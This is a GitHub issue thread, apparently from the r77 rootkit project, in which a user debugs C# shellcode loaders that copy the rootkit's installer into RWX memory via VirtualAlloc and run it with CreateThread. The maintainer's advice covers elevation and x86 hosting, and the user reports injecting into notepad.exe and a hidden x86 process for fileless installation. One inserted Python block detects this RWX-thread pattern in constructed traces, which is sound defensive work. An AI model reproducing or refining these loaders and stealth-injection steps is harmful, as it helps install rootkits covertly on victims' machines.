Closed fSociety-Protected closed 3 months ago
When I compile like that:
```csharp
using System;
using System.Runtime.InteropServices;

public static class Program
{
    public static void Main()
    {
        // 1. Load Install.shellcode from resources
        byte[] shellCode;
        // Load the shellcode from resources by its name "C9_ShellCode"
        shellCode = ShellCode.Properties.Resources.Install_shellcode; // Assuming the shellcode is stored as a resource in the project

        // 2. Create an RWX buffer with the shellcode
        IntPtr buffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, 0x1000, 0x40);
        Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

        // 3. Start the shellcode in a thread and wait until it terminates
        IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
        WaitForSingleObject(thread, 0xffffffff);

        // Free the allocated memory after executing the shellcode
        VirtualFree(buffer, UIntPtr.Zero, 0x8000);
    }

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, uint dwFreeType);
}
```
Then it WORKS!

But when I try to create a function and call it when I press a button, it doesn't work. IDK....

```csharp
private const int PROCESS_ALL_ACCESS = 0x1F0FFF;
private const uint MEM_COMMIT = 0x00001000;
private const uint MEM_RESERVE = 0x00002000;
private const uint PAGE_EXECUTE_READWRITE = 0x40;

[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll", SetLastError = true)]
private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, uint dwFreeType);

public void C9__INIT__INSTALL__STAGE()
{
    // 1. Load Install.shellcode from resources
    byte[] shellCode;
    // Load the shellcode from resources by its name "C9_ShellCode"
    shellCode = C9_LOADER.Properties.Resources.Install_shellcode; // Assuming the shellcode is stored as a resource in the project

    // 2. Create an RWX buffer with the shellcode
    IntPtr buffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, 0x1000, 0x40);
    Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

    // 3. Start the shellcode in a thread and wait until it terminates
    IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
    WaitForSingleObject(thread, 0xffffffff);

    // Free the allocated memory after executing the shellcode
    VirtualFree(buffer, UIntPtr.Zero, 0x8000);
}

public void INSTALL_Click(object sender, RoutedEventArgs e)
{
    C9__INIT__INSTALL__STAGE();
}
```
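The loader pattern discussed in this thread (an RWX allocation via `VirtualAlloc` with `PAGE_EXECUTE_READWRITE`, followed by `CreateThread` pointed at that buffer) is exactly the sequence that EDR and sandbox telemetry keys on. The following detection helper is an added example written for this page; it is not code from the r77 project or from anyone in the thread. It assumes a simple line-oriented API trace format (`pid api key=value ...`) that I constructed for the example, with constructed sample lines; real telemetry formats differ.

```python
import re
from dataclasses import dataclass

# Protection constant used by the loader in the thread (flProtect / flNewProtect value).
PAGE_EXECUTE_READWRITE = 0x40

# Constructed sample API trace (NOT real telemetry): "pid api key=value ...".
# pid 4711: RWX alloc + thread started at the allocation base (the pattern from the thread).
# pid 4712: read/write alloc and a thread at a module address -> benign, must not be flagged.
# pid 4713: RWX alloc in another process + remote thread inside that region.
SAMPLE_TRACE = """\
4711 VirtualAlloc lpAddress=0x0 dwSize=0x1200 flAllocationType=0x1000 flProtect=0x40 ret=0x02c40000
4711 CreateThread lpStartAddress=0x02c40000 dwCreationFlags=0x0 ret=0x1f4
4711 WaitForSingleObject hHandle=0x1f4 dwMilliseconds=0xffffffff ret=0x0
4712 VirtualAlloc lpAddress=0x0 dwSize=0x1000 flAllocationType=0x1000 flProtect=0x04 ret=0x00a10000
4712 CreateThread lpStartAddress=0x77e1d2f0 dwCreationFlags=0x0 ret=0x2c8
4713 VirtualAllocEx hProcess=0x3a0 lpAddress=0x0 dwSize=0x2000 flAllocationType=0x3000 flProtect=0x40 ret=0x03100000
4713 CreateRemoteThread hProcess=0x3a0 lpStartAddress=0x03100400 ret=0x300
"""


@dataclass(frozen=True)
class Finding:
    pid: int
    api: str
    start_address: int
    region_base: int
    region_size: int


_KV = re.compile(r"(\w+)=(0x[0-9a-fA-F]+|\d+)")


def parse_line(line):
    """Return (pid, api, args) for one trace line, or None if the line is blank/malformed."""
    parts = line.split(None, 2)
    if len(parts) < 2:
        return None
    try:
        pid = int(parts[0])
    except ValueError:
        return None
    rest = parts[2] if len(parts) > 2 else ""
    args = {k: int(v, 0) for k, v in _KV.findall(rest)}
    return pid, parts[1], args


def detect_rwx_thread_start(trace_text):
    """Flag thread creations whose start address lies inside a region made RWX earlier in the trace.

    Regions are tracked per (pid, target): target is the hProcess handle for the *Ex
    variants and 0 for the caller's own address space.
    """
    regions = {}   # (pid, target) -> list of (base, size)
    findings = []
    for line in trace_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        pid, api, a = parsed
        if api in ("VirtualAlloc", "VirtualAllocEx") and a.get("flProtect") == PAGE_EXECUTE_READWRITE:
            base = a.get("ret", 0)
            if base:                       # a NULL return means the allocation failed
                target = a.get("hProcess", 0) if api == "VirtualAllocEx" else 0
                regions.setdefault((pid, target), []).append((base, a.get("dwSize", 0)))
        elif api in ("VirtualProtect", "VirtualProtectEx") and a.get("flNewProtect") == PAGE_EXECUTE_READWRITE:
            # A region flipped to RWX after the fact counts the same as one allocated RWX.
            target = a.get("hProcess", 0) if api == "VirtualProtectEx" else 0
            regions.setdefault((pid, target), []).append((a.get("lpAddress", 0), a.get("dwSize", 0)))
        elif api in ("CreateThread", "CreateRemoteThread"):
            start = a.get("lpStartAddress")
            if start is None:
                continue
            target = a.get("hProcess", 0) if api == "CreateRemoteThread" else 0
            for base, size in regions.get((pid, target), []):
                if base <= start < base + size:
                    findings.append(Finding(pid, api, start, base, size))
                    break
    return findings


if __name__ == "__main__":
    for f in detect_rwx_thread_start(SAMPLE_TRACE):
        print(f"pid {f.pid}: {f.api} start=0x{f.start_address:08x} "
              f"inside RWX region 0x{f.region_base:08x}+0x{f.region_size:x}")
```

Treat a hit as a triage signal rather than a verdict: JIT runtimes such as the CLR also allocate RWX pages legitimately, and this helper does not track `VirtualFree`, so a region reused after being freed would still match. In practice the discriminating detail is the one the thread itself illustrates: a thread whose start address is not backed by any loaded module.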
Just don't use chatgpt to write code
[ UPDATE LOG ]

Now I'm even more confused, because this Install.shellcode sometimes works and sometimes it doesn't.... It used to seem to work and run as Install.exe should, but now it doesn't anymore....
Just a few quick questions... Why do you create a new dummy process to run the shellcode? It's enough to create a thread and run it there. And secondly, does your process run with elevated privileges? If it doesn't, then installation will fail. One more thing to keep in mind is that the hosting process must be 32-bit. If you just run Powershell.exe, then that process will certainly be the 64-bit executable.

I suggest that you run the shellcode within the current process, make sure it's elevated and x86. Can you try that? If this doesn't work, could you please debug into `VirtualAlloc` ... `CreateThread` and tell me which one of these API calls fails, i.e. which one returns an error result? Please remember to run Visual Studio with elevated privileges as well when debugging the shellcode installation.
Yeah, I have already patched my OS to RUN everything with the highest Admin permissions, so it shouldn't be a permissions issue.

In terms of architecture, there shouldn't be any problem either. Considering that both my project and all the "mini-test projects" are set to run on x86, there shouldn't be any incompatibility problem with the ShellCode execution.

Well, I was testing (at least when it worked), before I started using as a template the example you use to load the Install.shellcode directly from resources, I used the ShellCode loaded directly in the code of my program... I was testing and testing... but I always crashed the thread I created to store the shellcode. Then I was doing injection tests on different processes, and I realized that some of them worked and others did not. For example, if I used the calc.exe process (I'm talking about the classic version of win32calc.exe) for some reason the shellcode was not injected, but when I did it with for example the notepad.exe process then it worked.

But well, as I started using your shellcode loader model, I left that research path. But now the problem I have is that before, your code, without receiving any modification or anything, worked perfectly for me, but now I don't know why it doesn't work for me, and suddenly, there are times when it does. IDK....

I don't know, it's very strange... I'm doing my main project in WPF with C#, I don't know if I should use a different design guideline from the one you show as an example in C#.
```text
ShellCode.exe (process 69360) was closed with code 0.
To automatically close the console when debugging stops, enable Tools ->Options ->Debugging ->Close console automatically when debugging stops.
Press any key to close this window. . .

'ShellCode.exe' (CoreCLR: DefaultDomain): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Private.CoreLib.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Usersers\Rootkit.SYSourceSourceRepositoryShellCodeShellCodeCodeBinix.0ShellCode.dll' loaded. The module was compiled without symbols.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'c:\program files\microsoft visual studio\2022\community\common7\idecommonextensions\microsoft\hotreload\Microsoft.Extensions.DotNetDeltaApplier.dll' loaded. Symbol loading was skipped. The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.IO.Pipes.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Linq.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Collections.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Console.dll' loaded.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Threading.dll' loaded. Symbol loading was skipped. The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.InteropServices.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Threading.Overlapped.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.AccessControl.dll' loaded.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.Principal.Windows.dll' loaded. Symbol loading was skipped. The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.Claims.dll' loaded. Symbol loading was skipped. The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.Loader.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Collections.Concurrent.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
The program '[69360] ShellCode.exe' terminated with code 0 (0x0).
```
The truth is, due to my inexperience with WinApi functions, I'm probably not seeing the obvious, but at least, from here, everything seems to be running fine, or at least that's the feeling I have, that all WinApi functions are running correctly, but once the Install.Shellcode program is finished it has not been executed. I have checked that it is well implemented as a resource, but well, if it wasn't, I guess I would have noticed it.
```csharp
using System;
using System.Runtime.InteropServices;

public static class Program
{
    public static void Main()
    {
        try
        {
            // --- Elevated privileges required ---
            Console.WriteLine(" ");

            // 1. Load Install.shellcode from resources or from a byte[]
            byte[] shellCode = ShellCode.Properties.Resources.Install_shellcode;
            Console.WriteLine(" #> Install.shellcode loaded successfully from Resources! OK");

            // 2. Create an RWX buffer with the shellcode.
            IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
            if (buffer == IntPtr.Zero)
            {
                Console.WriteLine(" #> Failed to allocate memory for shellcode buffer. FAIL");
                return;
            }
            Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
            Console.WriteLine(" #> Shellcode copied to allocated buffer successfully! OK");

            // 3. Start the shellcode in a thread and wait until it terminates.
            IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
            if (thread == IntPtr.Zero)
            {
                Console.WriteLine(" #> Failed to create a new thread for shellcode execution. FAIL");
                return;
            }
            Console.WriteLine(" #> Shellcode execution started successfully! OK");

            // Wait for the thread to finish
            WaitForSingleObject(thread, 0xffffffff);
            Console.WriteLine(" #> Shellcode execution completed! OK");
        }
        catch (Exception ex)
        {
            Console.WriteLine($" #> An unexpected error occurred: {ex.Message}");
        }
    }

    [DllImport("kernel32.dll")]
    private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);

    [DllImport("kernel32.dll")]
    private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);

    [DllImport("kernel32.dll")]
    private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
}
```
> If this doesn't work, could you please debug into `VirtualAlloc` ... `CreateThread` and tell me which one of these API calls fails, i.e. which one returns an error result?

Post Sentence:

In the last tests I did, without creating any dummy process or anything, but creating a new thread for the ShellCode, I put several checks to find the exact point where it failed, and everything is OK until the CreateThread(); there the thread is created, but a second later it crashes and therefore the main Thread too.

---

Okay, I am gonna turn *** crazy... Rlly!!

Now, without touching anything, it stopped working!! Idk what's happening @bytecode77
The test project, in which ONLY your template is written, works 100% now!!
---

I don't know, but the feeling I get is as if the memory space or the RWX Buffer is not always available at every startup in my program thread.

It's just a theory, ofc...

And that is why sometimes it works and sometimes it does not.

Or... am I missing something in all this to get this code to work in my C# WPF project?

Because the ShellCode works fine, but without doing anything to the code, just close the program & start again, now it doesn't work...
```csharp
public void INSTALL_Click(object sender, RoutedEventArgs e)
{
    C9__INIT__INSTALL__STAGE();
}

public static void C9__INIT__INSTALL__STAGE()
{
    // --- Elevated privileges required ---
    Debug.WriteLine(" ");

    // 1. Load Install.shellcode from resources or from a byte[]
    byte[] shellCode = C9_LOADER.Properties.Resources.Install_shellcode;
    Debug.WriteLine(" #> Install.shellcode loaded successfully from Resources! OK");

    // 2. Create an RWX buffer with the shellcode.
    IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
    if (buffer == IntPtr.Zero)
    {
        Debug.WriteLine(" #> Failed to allocate memory for shellcode buffer. FAIL");
    }
    Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
    Debug.WriteLine(" #> Shellcode copied to allocated buffer successfully! OK");

    // 3. Start the shellcode in a thread and wait until it terminates.
    IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
    if (thread == IntPtr.Zero)
    {
        Debug.WriteLine(" #> Failed to create a new thread for shellcode execution. FAIL");
    }
    Debug.WriteLine(" #> Shellcode execution started successfully! OK");

    // Wait for the thread to finish
    WaitForSingleObject(thread, 0xffffffff);
    Debug.WriteLine(" #> Shellcode execution completed! OK");
}

[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);

[DllImport("kernel32.dll")]
private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);

[DllImport("kernel32.dll")]
private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
```

---

- Nothing, I tried it a lot of times, different methods, different things, but the Shellcode sometimes works, sometimes not...
https://github.com/bytecode77/r77-rootkit/assets/72263269/46afe89e-6618-426d-abe6-f82df22be4ec
---

Apparently, the problem was inside my main program, which had some functions running on x64 architecture. (As the part of the process which would not be affected by anything related to the above mentioned x64 architecture was not well defined, and I don't know how to do it correctly, the truth...) the shellcode did NOT work on many occasions; it ONLY worked on the occasions in which the memory area which was reserved to host the shellcode was exclusively x86.

So, I went back to my old development path, creating a CMD.EXE console with special attributes to be invisible, and inside that created CMD.EXE console I could then generate an exclusive process, entirely with x86 architecture, to be able to inject the shellcode without ANY problem 100% of the time.

So if there is nothing more to add, when you read all this @bytecode77, you can close this Github thread.

The truth is that it has been a hard path in which I have learned a lot about memory management and processes in general, about how shellcodes work and how to inject them into the different Windows processes.
Okay, I see that you've been analyzing the issue and fixed it. That's pretty much what takes up 90 % of my development time for this project.
Glad to hear everything works.
I'm still developing my project, but I need some help @bytecode77!

I need to use the Install.ShellCode to run it directly in memory, without dropping/writing any executable. But I can't get it to work flawlessly....

Today I spent all day creating this process...

Scenario: In my main program, I have 2 Buttons (only one "works"), one for INSTALL & the other for UNINSTALL. The plan was to create a powershell process that appears hidden, only for 3 seconds, and then inject the ShellCode into that process.

It works nicely, but I rebooted my machine & now it STOPPED working... I think it's easier & less complicated, but I need a bit of help.

That's the function I'm actually using:

_And then on the Click_EventBtn I have that:_

### PS = The Actual ShellCode Written In This Code Is Just A Dummy ShellCode! ( calc.exe )